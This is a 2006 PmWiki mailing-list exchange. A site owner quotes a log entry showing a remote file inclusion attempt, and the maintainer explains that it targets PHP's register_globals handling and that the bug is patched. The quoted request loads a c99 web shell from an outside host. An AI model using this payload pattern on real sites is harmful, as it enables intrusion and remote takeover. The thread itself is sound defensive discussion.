[pmwiki-users] CSS style attack on PmWiki?
Patrick R. Michaud
pmichaud at pobox.com
Wed Feb 1 15:18:42 CST 2006
On Thu, Feb 02, 2006 at 10:08:05AM +1300, Robin Sheat wrote:
> I just saw this in my logs:
> 198.87.3.70 - - [02/Feb/2006:09:26:49 +1300]
> "GET /PmWiki/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.world-garments.com/q/c99shell.txt?
> HTTP/1.1" 302 152 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; sq-AL;
> rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
>
> Someone with a bit more PHP knowledge might know what they were trying to
> do. It didn't work on my site, anyway, due to the URL rewriting I do
> breaking things for them.
They're trying to attack the site using a bug in PHP 5's
register_globals handling. This particular vulnerability was
closed for PmWiki in the last beta release, although it may still
affect other PHP scripts.
As long as your site is running with PHP's register_globals
disabled, you're safe from this particular attack.
Pm
More information about the pmwiki-users
mailing list